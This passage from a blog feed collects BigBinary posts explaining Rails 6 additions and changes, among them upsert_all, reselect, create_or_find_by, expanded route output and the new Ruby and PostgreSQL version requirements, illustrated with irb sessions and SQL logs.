href="https://github.com/postgres/postgres/blob/beeb8e2e0717065296dc7b32daba2d66f0f931dd/src/backend/executor/nodeModifyTable.c#L1335-L1355">here</a>.</p><p>The <code>PG::CardinalityViolation</code> exception occurs when a single <code>ON CONFLICT DO UPDATE</code> SQL query would update the same row a second time. PostgreSQL rejects this because the same row would otherwise be updated twice within one statement, in an unspecified order, non-deterministically.</p><p>PostgreSQL makes it the developer's responsibility to prevent this situation from occurring.</p><p>There's more discussion about this issue in <a href="https://github.com/rails/rails/issues/35519">rails/rails#35519</a>.</p><p>Therefore, the <code>upsert_all</code> method doesn't work as intended, due to the above limitation in PostgreSQL.</p><p>As a workaround, we can divide the single <code>upsert_all</code> query into multiple <code>upsert_all</code> queries with the use of the <code>unique_by</code> option, similar to what we did for SQLite in section 4.2 above.</p><pre><code class="language-ruby">Article.insert_all(
  [
    { id: 1, title: 'Handling 1M requests per second', author: 'John', slug: '1m-req-per-second' },
    { id: 2, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-1' },
    { id: 4, title: 'Dockerizing and deploy Rails app to Kubernetes', author: 'Paul', slug: 'rails-on-k8s' },
    { id: 6, title: 'Working Remotely', author: 'Greg', slug: 'working-remotely' }
  ]
)

Article.upsert_all(
  [
    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here
  ]
)

Article.upsert_all(
  [
    { id: 3, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-2' }, # duplicate 'title' and 'author' here
  ],
  unique_by: :index_articles_on_title_and_author
)

Article.upsert_all(
  [
    { id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, # duplicate 'slug' here
  ]
)

puts Article.count
# 
5

puts Article.all
#&lt;ActiveRecord::Relation [#&lt;Article id: 1, title: &quot;Type Safety in Elm&quot;, slug: &quot;elm-type-safety&quot;, author: &quot;George&quot;, description: nil&gt;, #&lt;Article id: 2, title: &quot;Authentication with Devise - Part 1&quot;, slug: &quot;devise-auth-2&quot;, author: &quot;Laura&quot;, description: nil&gt;, #&lt;Article id: 4, title: &quot;Dockerizing and deploy Rails app to Kubernetes&quot;, slug: &quot;rails-on-k8s&quot;, author: &quot;Paul&quot;, description: nil&gt;, #&lt;Article id: 5, title: &quot;Elm on Rails&quot;, slug: &quot;1m-req-per-second&quot;, author: &quot;Amanda&quot;, description: nil&gt;, #&lt;Article id: 6, title: &quot;Working Remotely&quot;, slug: &quot;working-remotely&quot;, author: &quot;Greg&quot;, description: nil&gt;]&gt;</code></pre><p>For reference, note that the <code>upsert_all</code> method also accepts the <code>returning</code> option for PostgreSQL, which we have already discussed in section 1.1 above.</p><h2>5. <code>insert</code>, <code>insert!</code> and <code>upsert</code></h2><p>Rails 6 has also introduced three more methods, namely <code>insert</code>, <code>insert!</code> and <code>upsert</code>, for convenience.</p><p>The <code>insert</code> method inserts a single record into the database. 
If that record violates a uniqueness constraint, the <code>insert</code> method will skip inserting the record into the database without raising an exception.</p><p>Similarly, the <code>insert!</code> method also inserts a single record into the database, but it raises an <code>ActiveRecord::RecordNotUnique</code> exception if that record violates a uniqueness constraint.</p><p>The <code>upsert</code> method inserts or updates a single record in the database, similar to how <code>upsert_all</code> does.</p><p>The methods <code>insert</code>, <code>insert!</code> and <code>upsert</code> are wrappers around <code>insert_all</code>, <code>insert_all!</code> and <code>upsert_all</code> respectively.</p><p>Let's see some examples to understand the usage of these methods.</p><pre><code class="language-ruby">Article.insert({ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, unique_by: :slug)

# is same as

Article.insert_all([{ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }], unique_by: :slug)</code></pre><pre><code class="language-ruby">Article.insert!({ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, returning: %w[ id title ])

# is same as

Article.insert_all!([{ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }], returning: %w[ id title ])</code></pre><pre><code class="language-ruby">Article.upsert({ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, unique_by: :slug, returning: %w[ id title ])

# is same as

Article.upsert_all([{ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }], unique_by: :slug, returning: %w[ id title ])</code></pre><hr><p>To learn more about the bulk insert feature and its implementation, please check <a href="https://github.com/rails/rails/pull/35077">rails/rails#35077</a>, <a href="https://github.com/rails/rails/pull/35546">rails/rails#35546</a> and <a 
href="https://github.com/rails/rails/pull/35854">rails/rails#35854</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 drops support for PostgreSQL version less than 9.3]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-drops-support-for-postgresql-less-than-9-3"/>
      <updated>2019-04-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-drops-support-for-postgresql-less-than-9-3</id>
      <content type="html"><![CDATA[<p>Before Rails 6, Rails supported PostgreSQL versions 9.1 and above. But in Rails 6, <a href="https://github.com/rails/rails/pull/34520">support for versions less than 9.3 is dropped</a>. If your PostgreSQL version is less than 9.3, then an <a href="https://travis-ci.org/codetriage/codetriage/jobs/506656780#L1591">error</a> is shown as follows.</p><pre><code class="language-text">Your version of PostgreSQL (90224) is too old. Active Record supports PostgreSQL &gt;= 9.3.</code></pre><p>Travis CI uses <a href="https://docs.travis-ci.com/user/database-setup/#postgresql">PostgreSQL 9.2</a> by default in their images. So this error can occur while testing the app on Travis CI with Rails 6. It can be resolved by using an <a href="https://github.com/codetriage/codetriage/blob/rails-6/.travis.yml#L12-L13">add-on for PostgreSQL</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 requires Ruby 2.5 or newer]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-requires-ruby-2-5-or-newer"/>
      <updated>2019-04-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-requires-ruby-2-5-or-newer</id>
      <content type="html"><![CDATA[<p>As per <a href="https://github.com/rails/rails/pull/34754">rails/rails#34754</a>, a Rails 6 app requires Ruby version 2.5 or newer.</p><p>Let's discuss what we need to know if we are dealing with Rails 6.</p><h2>Ensuring a valid Ruby version is set while creating a new Rails 6 app</h2><p>While creating a new Rails 6 app, we need to ensure that the current Ruby version in the shell is set to 2.5 or newer.</p><p>If it is set to an older version, then the <code>rails new</code> command will use that same version to set the Ruby version in <code>.ruby-version</code> and in <code>Gemfile</code> in the created Rails app.</p><pre><code class="language-plaintext">$ ruby -v
ruby 2.3.1p112 (2016-04-26 revision 54768) [x86_64-darwin15]

$ rails new meme-wizard
create
create README.md
create Rakefile
create .ruby-version
create config.ru
create .gitignore
create Gemfile
[...] omitted the rest of the output

$ cd meme-wizard &amp;&amp; grep -C 2 -Rn -a &quot;2.3.1&quot; .
./.ruby-version:1:2.3.1
----
./Gemfile-2-git_source(:github) { |repo| &quot;https://github.com/#{repo}.git&quot; }
./Gemfile-3-
./Gemfile:4:ruby '2.3.1'
./Gemfile-5-
./Gemfile-6-# Bundle edge Rails instead: gem 'rails', github: 'rails/rails'</code></pre><p>An easy fix for this is to install Ruby version 2.5 or newer and use that version prior to running the <code>rails new</code> command.</p><pre><code class="language-plaintext">$ ruby -v
ruby 2.3.1p112 (2016-04-26 revision 54768) [x86_64-darwin15]

$ rbenv local 2.6.0

$ ruby -v
ruby 2.6.0p0 (2018-12-25 revision 66547) [x86_64-darwin18]

$ rails new meme-wizard

$ cd meme-wizard &amp;&amp; grep -C 2 -Rn -a &quot;2.6.0&quot; .
./.ruby-version:1:2.6.0
----
./Gemfile-2-git_source(:github) { |repo| &quot;https://github.com/#{repo}.git&quot; }
./Gemfile-3-
./Gemfile:4:ruby '2.6.0'
./Gemfile-5-
./Gemfile-6-# Bundle edge Rails instead: gem 'rails', github: 'rails/rails'</code></pre><h2>Upgrading an older Rails app to Rails 6</h2><p>While 
upgrading an older Rails app to Rails 6, we need to update the Ruby version to 2.5 or newer in the <code>.ruby-version</code> and <code>Gemfile</code> files respectively.</p><h2>What else do we need to know?</h2><p>Since <a href="https://blog.bigbinary.com/2018/02/06/ruby-2-5-added-hash-slice-method.html">Ruby 2.5 has added the <code>Hash#slice</code> method</a>, the extension method with the same name defined by <code>activesupport/lib/active_support/core_ext/hash/slice.rb</code> has been <a href="https://github.com/rails/rails/pull/34754">removed from Rails 6</a>.</p><p>Similarly, Rails 6 has also <a href="https://github.com/rails/rails/pull/32034">removed</a> the extension methods <code>Hash#transform_values</code> and <code>Hash#transform_values!</code> from Active Support in favor of the native methods with the same names which exist in Ruby. These methods were <a href="https://blog.bigbinary.com/2017/06/14/ruby-2-4-added-hash-transform-values-and-its-destructive-version-from-active-support.html">introduced natively in Ruby 2.4</a>.</p><p>If we try to explicitly require <code>active_support/core_ext/hash/transform_values</code>, then it prints a deprecation warning.</p><pre><code class="language-ruby">&gt;&gt; require &quot;active_support/core_ext/hash/transform_values&quot;
# DEPRECATION WARNING: Ruby 2.5+ (required by Rails 6) provides Hash#transform_values natively, so requiring active_support/core_ext/hash/transform_values is no longer necessary. Requiring it will raise LoadError in Rails 6.1. (called from irb_binding at (irb):1)
=&gt; true</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 database seed uses inline Active Job adapter]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/database-seeding-task-uses-inline-active-job-adapter-in-rails-6"/>
      <updated>2019-04-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/database-seeding-task-uses-inline-active-job-adapter-in-rails-6</id>
      <content type="html"><![CDATA[<p>We use the <code>db:seed</code> task to seed the database in Rails apps. Recently, an <a href="https://github.com/rails/rails/issues/34939">issue</a> was reported on the Rails issue tracker where the <code>db:seed</code> task was not finishing.</p><p>In the development environment, Rails uses the <a href="https://api.rubyonrails.org/v5.2/classes/ActiveJob/QueueAdapters/AsyncAdapter.html">async adapter</a> as the default Active Job adapter. The async adapter runs jobs with an in-process thread pool.</p><p>This specific issue was happening because the seed task was trying to attach a file using Active Storage. Active Storage <a href="https://github.com/rails/rails/blob/9e34df00039d63b5672315419e76f06f80ef3dc4/activestorage/app/models/active_storage/attachment.rb#L37">adds a job in the background</a> during the attachment process. This job was not getting executed properly by the async adapter, causing the seed task to hang without exiting.</p><p>It was found that the issue goes away when the <a href="https://api.rubyonrails.org/v5.2/classes/ActiveJob/QueueAdapters/InlineAdapter.html">inline</a> adapter is used in the development environment. But wholesale switching the default adapter in the development environment to the inline adapter would defeat the purpose of having the async adapter as the default in the first place.</p><p>Instead, a change was made to <a href="https://github.com/rails/rails/pull/34953">execute all the code related to seeding using the inline adapter</a>. The inline adapter makes sure that all the jobs are executed immediately.</p><p>As the inline adapter does not allow queuing up jobs for the future, this can result in an error if the seeding code somehow triggers such jobs. This <a href="https://github.com/rails/rails/issues/35812#issuecomment-479385857">issue</a> has already been reported on GitHub.</p><h3>Update</h3><p>Active Job is an optional framework and we can skip it completely. 
Now that seeding depended on the presence of Active Job, it was throwing an error when Active Job was not part of the application. Also, automatically executing jobs inline when users had set the Active Job queue adapter to something of their choice was surprising for the users. So a <a href="https://github.com/rails/rails/pull/35896">change</a> has been made to load the seeds inline only when Active Job is included in the application and the queue adapter is <code>async</code>. This makes the change backward compatible, and it does not alter the user's choice of queue adapter automatically.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#reselect]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-reselect"/>
      <updated>2019-04-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-reselect</id>
      <content type="html"><![CDATA[<p>Rails has the <a href="https://apidock.com/rails/ActiveRecord/QueryMethods/rewhere"><code>rewhere</code></a> and <a href="https://apidock.com/rails/ActiveRecord/QueryMethods/reorder"><code>reorder</code></a> methods to replace previously set condition attributes with the new attributes given as arguments.</p><p>Before Rails 6, changing the previously set <code>select</code> statement attributes to new attributes was done as follows.</p><pre><code class="language-ruby">&gt;&gt; Post.select(:title, :body).unscope(:select).select(:views)
   SELECT &quot;posts&quot;.&quot;views&quot; FROM &quot;posts&quot; LIMIT ?  [[&quot;LIMIT&quot;, 1]]</code></pre><p>In Rails 6, the <code>ActiveRecord::Relation#reselect</code> method has been added.</p><p>The <code>reselect</code> method is similar to <code>rewhere</code> and <code>reorder</code>. <code>reselect</code> is a short-hand for <code>unscope(:select).select(fields)</code>.</p><p>Here is how the <code>reselect</code> method can be used.</p><pre><code class="language-ruby">&gt;&gt; Post.select(:title, :body).reselect(:views)
   SELECT &quot;posts&quot;.&quot;views&quot; FROM &quot;posts&quot; LIMIT ?  [[&quot;LIMIT&quot;, 1]]</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/33611">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveModel::Errors#of_kind?]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activemodel-errors-of_kind-"/>
      <updated>2019-04-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activemodel-errors-of_kind-</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/34866">of_kind?</a> on <code>ActiveModel::Errors</code>. It returns true if the <code>ActiveModel::Errors</code> object has the provided key with the given message associated with it. The default message is <code>:invalid</code>.</p><p><a href="https://github.com/rails/rails/pull/34866">of_kind?</a> is the same as <a href="https://api.rubyonrails.org/classes/ActiveModel/Errors.html#method-i-added-3F">ActiveModel::Errors#added?</a>, but it doesn't take extra options as a parameter.</p><p>Let's check out how it works.</p><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   validates :name, presence: true
&gt;&gt; end

&gt;&gt; user = User.new
=&gt; #&lt;User id: nil, name: nil, password: nil, created_at: nil, updated_at: nil&gt;

&gt;&gt; user.valid?
=&gt; false

&gt;&gt; user.errors
=&gt; #&lt;ActiveModel::Errors:0x00007fc462a1d140 @base=#&lt;User id: nil, name: nil, password: nil, created_at: nil, updated_at: nil&gt;, @messages={:name=&gt;[&quot;can't be blank&quot;]}, @details={:name=&gt;[{:error=&gt;:blank}]}&gt;

&gt;&gt; user.errors.of_kind?(:name)
=&gt; false

&gt;&gt; user.errors.of_kind?(:name, :blank)
=&gt; true

&gt;&gt; user.errors.of_kind?(:name, &quot;can't be blank&quot;)
=&gt; true

&gt;&gt; user.errors.of_kind?(:name, &quot;is blank&quot;)
=&gt; false</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/34866">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 shows routes in expanded format]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-shows-routes-in-expanded-format"/>
      <updated>2019-03-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-shows-routes-in-expanded-format</id>
      <content type="html"><![CDATA[<p>The output of <code>rails routes</code> is in a table format.</p><pre><code class="language-bash">$ rails routes

   Prefix Verb   URI Pattern               Controller#Action
    users GET    /users(.:format)          users#index
          POST   /users(.:format)          users#create
 new_user GET    /users/new(.:format)      users#new
edit_user GET    /users/:id/edit(.:format) users#edit
     user GET    /users/:id(.:format)      users#show
          PATCH  /users/:id(.:format)      users#update
          PUT    /users/:id(.:format)      users#update
          DELETE /users/:id(.:format)      users#destroy</code></pre><p>If we have long route names, they don't fit in the terminal window and the output lines wrap into each other.</p><p><img src="/blog_images/2019/rails-6-shows-routes-in-expanded-format/overlapping_routes.png" alt="Example of overlapping routes"></p><p>Rails 6 has added a way to display the routes in an <a href="https://github.com/rails/rails/pull/32130">expanded format</a>.</p><p>We can pass the <code>--expanded</code> switch to the <code>rails routes</code> command to see this in action.</p><pre><code class="language-bash">$ rails routes --expanded

--[ Route 1 ]--------------------------------------------------------------
Prefix            | users
Verb              | GET
URI               | /users(.:format)
Controller#Action | users#index
--[ Route 2 ]--------------------------------------------------------------
Prefix            |
Verb              | POST
URI               | /users(.:format)
Controller#Action | users#create
--[ Route 3 ]--------------------------------------------------------------
Prefix            | new_user
Verb              | GET
URI               | /users/new(.:format)
Controller#Action | users#new
--[ Route 4 ]--------------------------------------------------------------
Prefix            | edit_user
Verb              | GET
URI               | /users/:id/edit(.:format)
Controller#Action | users#edit</code></pre><p>This shows the output of the routes command in a much more user-friendly manner.</p><p>The <code>--expanded</code> switch can be used in conjunction with <a href="https://blog.bigbinary.com/2016/02/16/rails-5-options-for-rake-routes.html">other switches for searching specific routes</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveModel::Errors#slice!]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activemodel-errors-slice"/>
      <updated>2019-03-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activemodel-errors-slice</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/34489">slice!</a> on <code>ActiveModel::Errors</code>. With this addition, it becomes quite easy to select just a few keys from the errors and show or return them. Before Rails 6, we needed to convert the <code>ActiveModel::Errors</code> object to a hash before slicing the keys.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; user = User.new
=&gt; #&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;

&gt;&gt; user.valid?
=&gt; false

&gt;&gt; user.errors
=&gt; #&lt;ActiveModel::Errors:0x00007fc46700df10 @base=#&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;, @messages={:email=&gt;[&quot;can't be blank&quot;], :password=&gt;[&quot;can't be blank&quot;]}, @details={:email=&gt;[{:error=&gt;:blank}], :password=&gt;[{:error=&gt;:blank}]}&gt;

&gt;&gt; user.errors.slice!
=&gt; Traceback (most recent call last):
        1: from (irb):16
NoMethodError (undefined method 'slice!' for #&lt;ActiveModel::Errors:0x00007fa1f0e46eb8&gt;)
Did you mean?  slice_when

&gt;&gt; errors = user.errors.to_h
&gt;&gt; errors.slice!(:email)
=&gt; {:password=&gt;[&quot;can't be blank&quot;]}

&gt;&gt; errors
=&gt; {:email=&gt;[&quot;can't be blank&quot;]}</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; user = User.new
=&gt; #&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;

&gt;&gt; user.valid?
=&gt; false

&gt;&gt; user.errors
=&gt; #&lt;ActiveModel::Errors:0x00007fc46700df10 @base=#&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;, @messages={:email=&gt;[&quot;can't be blank&quot;], :password=&gt;[&quot;can't be blank&quot;]}, @details={:email=&gt;[{:error=&gt;:blank}], :password=&gt;[{:error=&gt;:blank}]}&gt;

&gt;&gt; user.errors.slice!(:email)
=&gt; {:password=&gt;[&quot;can't be blank&quot;]}

&gt;&gt; user.errors
=&gt; #&lt;ActiveModel::Errors:0x00007fc46700df10 @base=#&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;, @messages={:email=&gt;[&quot;can't be blank&quot;]}, @details={:email=&gt;[{:error=&gt;:blank}]}&gt;</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/34489">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds create_or_find_by and create_or_find_by!]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-create_or_find_by"/>
      <updated>2019-03-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-create_or_find_by</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> and <a href="https://github.com/rails/rails/pull/31989">create_or_find_by!</a>. Both of these methods rely on unique constraints at the database level. If creation fails because of a unique constraint on one or all of the given columns, the method will try to find the record using <code>find_by!</code>.</p><p><a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> is an improvement over <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Relation.html#method-i-find_or_create_by">find_or_create_by</a> because <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Relation.html#method-i-find_or_create_by">find_or_create_by</a> first queries for the record and then inserts it if none is found. This could lead to a race condition.</p><p>As mentioned by DHH in the pull request, <a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> has a few cons too:</p><ul><li>The table must have unique constraints on the relevant columns.</li><li>This method relies on exception handling, which is generally slower.</li></ul><p><a href="https://github.com/rails/rails/pull/31989">create_or_find_by!</a> raises an exception when creation fails because of validations.</p><p>Let's see how both methods work in Rails 6.0.0.beta2.</p><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; class CreateUsers &lt; ActiveRecord::Migration[6.0]
&gt;&gt;   def change
&gt;&gt;     create_table :users do |t|
&gt;&gt;       t.string :name, index: { unique: true }
&gt;&gt;
&gt;&gt;       t.timestamps
&gt;&gt;     end
&gt;&gt;   end
&gt;&gt; end

&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   validates :name, presence: true
&gt;&gt; end

&gt;&gt; User.create_or_find_by(name: 'Amit')
   BEGIN
   INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, $3) RETURNING &quot;id&quot;  [[&quot;name&quot;, &quot;Amit&quot;], [&quot;created_at&quot;, &quot;2019-03-07 09:33:23.391719&quot;], [&quot;updated_at&quot;, &quot;2019-03-07 09:33:23.391719&quot;]]
   COMMIT
=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-07 09:33:23&quot;, updated_at: &quot;2019-03-07 09:33:23&quot;&gt;

&gt;&gt; User.create_or_find_by(name: 'Amit')
   BEGIN
   INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, $3) RETURNING &quot;id&quot;  [[&quot;name&quot;, &quot;Amit&quot;], [&quot;created_at&quot;, &quot;2019-03-07 09:46:37.189068&quot;], [&quot;updated_at&quot;, &quot;2019-03-07 09:46:37.189068&quot;]]
   ROLLBACK
=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-07 09:33:23&quot;, updated_at: &quot;2019-03-07 09:33:23&quot;&gt;

&gt;&gt; User.create_or_find_by(name: nil)
   BEGIN
   COMMIT
=&gt; #&lt;User id: nil, name: nil, created_at: nil, updated_at: nil&gt;

&gt;&gt; User.create_or_find_by!(name: nil)
=&gt; Traceback (most recent call last):
        1: from (irb):2
ActiveRecord::RecordInvalid (Validation failed: Name can't be blank)</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31989">pull request</a>.</p><p>Also note that <a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> can lead to primary keys running out if the type of the primary key is <code>int</code>. This happens because each time <a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> hits <code>ActiveRecord::RecordNotUnique</code>, it does not roll back the auto-increment of the primary key. The problem is discussed in this <a href="https://github.com/rails/rails/issues/35543">issue</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 raises ActiveModel::MissingAttributeError]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-raises-activemodel-missingattributeerror-when-update_columns-is-used-with-non-existing-attribute"/>
      <updated>2019-03-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-raises-activemodel-missingattributeerror-when-update_columns-is-used-with-non-existing-attribute</id>
      <content type="html"><![CDATA[<p>Rails 6 raises <code>ActiveModel::MissingAttributeError</code> when <a href="https://github.com/rails/rails/commit/b63701e272">update_columns</a> is used with a non-existing attribute. Before Rails 6, <a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Persistence.html#method-i-update_columns">update_columns</a> raised an <code>ActiveRecord::StatementInvalid</code> error.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; User.first.update_columns(email: 'amit@bigbinary.com')
   SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
   UPDATE &quot;users&quot; SET &quot;email&quot; = $1 WHERE &quot;users&quot;.&quot;id&quot; = $2  [[&quot;email&quot;, &quot;amit@bigbinary.com&quot;], [&quot;id&quot;, 1]]
=&gt; Traceback (most recent call last):
        1: from (irb):8
ActiveRecord::StatementInvalid (PG::UndefinedColumn: ERROR: column &quot;email&quot; of relation &quot;users&quot; does not exist)
LINE 1: UPDATE &quot;users&quot; SET &quot;email&quot; = $1 WHERE &quot;users&quot;.&quot;id&quot; = $2
^
: UPDATE &quot;users&quot; SET &quot;email&quot; = $1 WHERE &quot;users&quot;.&quot;id&quot; = $2</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; User.first.update_columns(email: 'amit@bigbinary.com')
   SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]]
Traceback (most recent call last):
        1: from (irb):1
ActiveModel::MissingAttributeError (can't write unknown attribute `email`)</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/commit/b63701e272">commit</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 ActiveRecord::Base.configurations]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-changed-activerecord-base-configurations-result-to-an-object"/>
      <updated>2019-03-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-changed-activerecord-base-configurations-result-to-an-object</id>
      <content type="html"><![CDATA[<p>Rails 6 changed the return value of <a href="https://github.com/rails/rails/pull/33637">ActiveRecord::Base.configurations</a> to an object of <code>ActiveRecord::DatabaseConfigurations</code>. Before Rails 6, <a href="https://api.rubyonrails.org/v5.2.2/classes/ActiveRecord/Core.html#method-c-configurations">ActiveRecord::Base.configurations</a> returned a hash with all the database configurations. We can call <code>to_h</code> on the <code>ActiveRecord::DatabaseConfigurations</code> object to get a hash.</p><p>A method named <a href="https://github.com/rails/rails/pull/33637">configs_for</a> has also been added to fetch configurations for a particular environment.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.configurations
=&gt; {&quot;development&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}, &quot;test&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/test.sqlite3&quot;}, &quot;production&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/production.sqlite3&quot;}}</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.configurations
=&gt; #&lt;ActiveRecord::DatabaseConfigurations:0x00007fc18274f9f0 @configurations=[#&lt;ActiveRecord::DatabaseConfigurations::HashConfig:0x00007fc18274f680 @env_name=&quot;development&quot;, @spec_name=&quot;primary&quot;, @config={&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}&gt;, #&lt;ActiveRecord::DatabaseConfigurations::HashConfig:0x00007fc18274f608 @env_name=&quot;test&quot;, @spec_name=&quot;primary&quot;, @config={&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/test.sqlite3&quot;}&gt;, #&lt;ActiveRecord::DatabaseConfigurations::HashConfig:0x00007fc18274f590 @env_name=&quot;production&quot;, @spec_name=&quot;primary&quot;, @config={&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/production.sqlite3&quot;}&gt;]&gt;

&gt;&gt; ActiveRecord::Base.configurations.to_h
=&gt; {&quot;development&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}, &quot;test&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/test.sqlite3&quot;}, &quot;production&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/production.sqlite3&quot;}}

&gt;&gt; ActiveRecord::Base.configurations['development']
